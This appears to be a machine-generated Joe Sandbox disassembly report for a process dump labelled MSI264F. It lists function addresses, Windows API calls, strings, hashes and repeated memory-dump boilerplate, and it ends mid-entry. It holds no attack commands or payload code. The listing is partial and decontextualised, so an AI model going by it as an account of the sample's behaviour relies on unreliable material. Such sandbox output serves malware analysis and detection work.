                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImage$List_$CountDestroyExtractReplace
                                                                                                                        • String ID: "
                                                                                                                        • API String ID: 2255942099-123907689
                                                                                                                        • Opcode ID: f480f16653afc0dd0ad20341598d2c82196a07564999c05903b80f3db4dc31fd
                                                                                                                        • Instruction ID: 25c1e6e2b4cdacda590fd8e084e1c99650267fb5354030eda22b74dcea1e0199
                                                                                                                        • Opcode Fuzzy Hash: f480f16653afc0dd0ad20341598d2c82196a07564999c05903b80f3db4dc31fd
                                                                                                                        • Instruction Fuzzy Hash: 8D31D731A052189BDB20DF68DC49BEA73F8EF44310F5046D5EC25D7291EBB4EA85CB91
                                                                                                                        Function 00B0C560 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B0C4C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00B0C4EA
                                                                                                                          • Part of subcall function 00B0C4C0: __wsplitpath.LIBCMT ref: 00B0C504
                                                                                                                          • Part of subcall function 00B0C4C0: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0C53D
                                                                                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00B0C60E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                        • API String ID: 806825551-1858614750
                                                                                                                        • Opcode ID: 3e9e6ab0ce2f8c350022a60310bba57a01a59a917274e275be150201024acc81
                                                                                                                        • Instruction ID: c9e63783c519bb98951ede5818b2e38ba8b97455eef9d39c6779fa0b838900ae
                                                                                                                        • Opcode Fuzzy Hash: 3e9e6ab0ce2f8c350022a60310bba57a01a59a917274e275be150201024acc81
                                                                                                                        • Instruction Fuzzy Hash: 8E21D77690021597D720AF64CD42ABB7FE4EFA4751F4406A9FC56971C1FB74EA01C390
                                                                                                                        Function 00AFC500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: %s_%08x%08x
                                                                                                                        • API String ID: 2111968516-3999349378
                                                                                                                        • Opcode ID: 9133816d6056b388234931d3ed96b261e91ebead727ceb47672d7c4a37c4ad8e
                                                                                                                        • Instruction ID: 252b15c567ab4747d06ca8dd9de548526fd4f17902d65c19a2d15e347a00b840
                                                                                                                        • Opcode Fuzzy Hash: 9133816d6056b388234931d3ed96b261e91ebead727ceb47672d7c4a37c4ad8e
                                                                                                                        • Instruction Fuzzy Hash: 1421F9B5B11109AF8B04DF99CC41CABBBFCEF8C214B108199FD09DB761D671AD529BA0
                                                                                                                        Function 00AE4530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 00AE4538
                                                                                                                        • GetObjectW.GDI32(00000000,0000005C,?), ref: 00AE4545
                                                                                                                        • _memset.LIBCMT ref: 00AE4564
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Stock_memset
                                                                                                                        • String ID: Courier$Terminal
                                                                                                                        • API String ID: 3401032496-3811170643
                                                                                                                        • Opcode ID: f66685ef0c507d851d789afc9030beae67736bbf474e46f897d7e46aad89ba16
                                                                                                                        • Instruction ID: 2db30a2e7d1424f4f21f56fe6bb4d610231553659530595146f063b5921b4552
                                                                                                                        • Opcode Fuzzy Hash: f66685ef0c507d851d789afc9030beae67736bbf474e46f897d7e46aad89ba16
                                                                                                                        • Instruction Fuzzy Hash: BD1122321007849FD7305F6DC848B67BBA8EF4A370F004719E2A14B2D0D3B8A84DC765
                                                                                                                        Function 00AEE890 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(shcore.dll,5E06C67B), ref: 00AEE8BE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00AEE8D2
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AEE91A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: GetDpiForMonitor$shcore.dll
                                                                                                                        • API String ID: 145871493-92391707
                                                                                                                        • Opcode ID: 014f4d1e143dcc1a360316d46fc7853c3ded51cce47e31eef06b9f891734cac6
                                                                                                                        • Instruction ID: 186ddee77c8551367ea4d8e074b99b6b706734f04a955866ffa88b21abd45071
                                                                                                                        • Opcode Fuzzy Hash: 014f4d1e143dcc1a360316d46fc7853c3ded51cce47e31eef06b9f891734cac6
                                                                                                                        • Instruction Fuzzy Hash: F8119431A046599BCB19DF5ADD44AAEBBFCFF85710F014169F815D7390DB749900CB90
                                                                                                                        Function 00AE2010 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AE2036
                                                                                                                        • _wcsncpy.LIBCMT ref: 00AE205E
                                                                                                                          • Part of subcall function 00B09850: _malloc.LIBCMT ref: 00B09859
                                                                                                                          • Part of subcall function 00B09850: _memset.LIBCMT ref: 00B09882
                                                                                                                        • wsprintfW.USER32 ref: 00AE2082
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$_malloc_wcsncpywsprintf
                                                                                                                        • String ID: %s.%04d.%s$Client
                                                                                                                        • API String ID: 3126312778-3365126691
                                                                                                                        • Opcode ID: 2032ed012fb306f6a657334beedab2692a006740a5f68619994f06d213045c48
                                                                                                                        • Instruction ID: 75e2250cb08a2a1448e8ebe6ec2f23c5987a3b6e65fc475dcd8f7c77c7ea0a68
                                                                                                                        • Opcode Fuzzy Hash: 2032ed012fb306f6a657334beedab2692a006740a5f68619994f06d213045c48
                                                                                                                        • Instruction Fuzzy Hash: 120100B6A41385ABEB206B099C42BB773ECEB50764F040165FD1A5B2C1E7B69C41C3A2
                                                                                                                        Function 00B18AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcstok$_malloc
                                                                                                                        • String ID: ,;$..\CTL32\util.cpp
                                                                                                                        • API String ID: 1825977170-923634865
                                                                                                                        • Opcode ID: d71d3a1db9e8130cc8d18d0864e25611ecc099c5e56569c8552ebd4b885fe894
                                                                                                                        • Instruction ID: 131eecb020ed2ca51016b0a29078d244e69040d0f6f29e00fa961fc8788da2a6
                                                                                                                        • Opcode Fuzzy Hash: d71d3a1db9e8130cc8d18d0864e25611ecc099c5e56569c8552ebd4b885fe894
                                                                                                                        • Instruction Fuzzy Hash: 8D0126B7A5420227CA10666CAC03BABB2DCEF94750F4801E1FD0CD7242EAF1EA05C2A1
                                                                                                                        Function 00B00EC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 00B00EFB
                                                                                                                        • _malloc.LIBCMT ref: 00B00F0A
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 00B00F20
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\NSMString.cpp, xrefs: 00B00EDC
                                                                                                                        • codepage == CP_ACP || codepage == CP_UTF8, xrefs: 00B00EE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$_malloc
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$codepage == CP_ACP || codepage == CP_UTF8
                                                                                                                        • API String ID: 4030181574-274046628
                                                                                                                        • Opcode ID: 1374344c96ff2ab1030cb3ab0d9e4c4a7b3dba8f0783e9a65039f4c3a5594fdc
                                                                                                                        • Instruction ID: 46e7d2bb98b81b6bd2b3bf6a0c3b5372de49a00c34873d7e46dd26a7ce5d1b7f
                                                                                                                        • Opcode Fuzzy Hash: 1374344c96ff2ab1030cb3ab0d9e4c4a7b3dba8f0783e9a65039f4c3a5594fdc
                                                                                                                        • Instruction Fuzzy Hash: F301D2716143067BE7209B59CC86F57B7DCEB54724F108626F91A976D0EAB0A500CA50
                                                                                                                        Function 00B16B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B16B8C
                                                                                                                        • _memset.LIBCMT ref: 00B16BA8
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 00B16BC6
                                                                                                                        • SetMenuItemInfoW.USER32(?,00000000,00000001,00000030), ref: 00B16BEF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$Count_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 162323998-4108050209
                                                                                                                        • Opcode ID: 110e23cdb5349dcfad09d83a033337ee581da4a1aa4d6be44b7808607e428ce7
                                                                                                                        • Instruction ID: f1c8748aa9767c2d42c7e194bdc0ee84bf667e20ac53c79e56b03126ef356ec8
                                                                                                                        • Opcode Fuzzy Hash: 110e23cdb5349dcfad09d83a033337ee581da4a1aa4d6be44b7808607e428ce7
                                                                                                                        • Instruction Fuzzy Hash: B1015B71901218BBDB10AF99EC8AEDFBBBCEB58714F500055F904E7180EBB09A44C6A1
                                                                                                                        Function 00B1A7C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(dwmapi.dll), ref: 00B1A802
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 00B1A81E
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1A849
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: DwmIsCompositionEnabled$dwmapi.dll
                                                                                                                        • API String ID: 145871493-1198327662
                                                                                                                        • Opcode ID: d5474569e496a93ced20f6610aa75949a3c3aa2ea78965a611f9e74f6f1e86e3
                                                                                                                        • Instruction ID: e1268333bc34f8b3272c407bf17f189f4134b9bfcabf123e898fff3b34e9fcb4
                                                                                                                        • Opcode Fuzzy Hash: d5474569e496a93ced20f6610aa75949a3c3aa2ea78965a611f9e74f6f1e86e3
                                                                                                                        • Instruction Fuzzy Hash: D70128710957649FD7214F29BC08BD53AD8DB00BA4F508268F8188B1E0EF71E981DF86
                                                                                                                        Function 00B12340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00B12354
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • wsprintfW.USER32 ref: 00B12398
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_mallocwsprintf
                                                                                                                        • String ID: %02x$%02x, $..\CTL32\util.cpp
                                                                                                                        • API String ID: 1803455386-1263427399
                                                                                                                        • Opcode ID: 9d758b392b1bfe3e8385265fca744b142d99b531fdb8569f25f349e863ff7064
                                                                                                                        • Instruction ID: 36d723101d2a7b59645f9f07cf851aa0252ee44e2db751473d12dc7348632231
                                                                                                                        • Opcode Fuzzy Hash: 9d758b392b1bfe3e8385265fca744b142d99b531fdb8569f25f349e863ff7064
                                                                                                                        • Instruction Fuzzy Hash: 0E0176B36002012BCF109F59FC90CEA73D9EFD8320B1800B8E9088B200E9799A11CBA0
                                                                                                                        Function 00AFEC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?), ref: 00AFECC3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFECC9
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?), ref: 00AFECEA
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFECF0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValue
                                                                                                                        • String ID: Policy
                                                                                                                        • API String ID: 3132538880-4157669408
                                                                                                                        • Opcode ID: d7b2878e3eea9b6a434117886fa9bf1817c3894dd57a1ebef84c7f6330f260a5
                                                                                                                        • Instruction ID: c24ee06a5112aec00921448e3a7a84c87218ac9e105938dc031b4f260f516203
                                                                                                                        • Opcode Fuzzy Hash: d7b2878e3eea9b6a434117886fa9bf1817c3894dd57a1ebef84c7f6330f260a5
                                                                                                                        • Instruction Fuzzy Hash: 7201EC71640704ABD634DB9ADC45F63F3ECFB88710F048919B645976A0C6B4F845CBA5
                                                                                                                        Function 00B0E6A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E6DC
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E6E5
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E712
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E71B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValue
                                                                                                                        • String ID: Policy
                                                                                                                        • API String ID: 3132538880-4157669408
                                                                                                                        • Opcode ID: a8e9b9a06034299262f77f0821513acc661b5edee0a2e94a14fff1825b194f41
                                                                                                                        • Instruction ID: 3bb825844c9350225d1eb08ce84f9a00e7c00e3fbbb57c43ed4f80d125082021
                                                                                                                        • Opcode Fuzzy Hash: a8e9b9a06034299262f77f0821513acc661b5edee0a2e94a14fff1825b194f41
                                                                                                                        • Instruction Fuzzy Hash: 2701EC72640704ABD635CAA9DC85FD2B3ECAB98701F04495DB3AA971D0C6B4F8448B64
                                                                                                                        Function 00B18A70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000000,?,?,00000847), ref: 00B18A88
                                                                                                                        • wsprintfW.USER32 ref: 00B18A9E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadStringwsprintf
                                                                                                                        • String ID: #%d$..\CTL32\util.cpp$i < cchBuf
                                                                                                                        • API String ID: 104907563-2369523344
                                                                                                                        • Opcode ID: cd7b8c0670ee21db93b44c7e4afebe01e7d1980263cc4f55913a05ce4d11e92f
                                                                                                                        • Instruction ID: ef66b1af7119b5a36f71c8c6c4b2579ff235063358902e4bb9529af44078bfa0
                                                                                                                        • Opcode Fuzzy Hash: cd7b8c0670ee21db93b44c7e4afebe01e7d1980263cc4f55913a05ce4d11e92f
                                                                                                                        • Instruction Fuzzy Hash: 7EF096766203197BD710AB58EC55DAB37DCFF44754B444061F908D3261EE74DD40C7A5
                                                                                                                        Function 00AFE354 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38sleepthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • ExitThread.KERNEL32 ref: 00AFE387
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00AFE3A2
                                                                                                                        • EnumWindows.USER32(Function_0001DA50,00000000), ref: 00AFE3BB
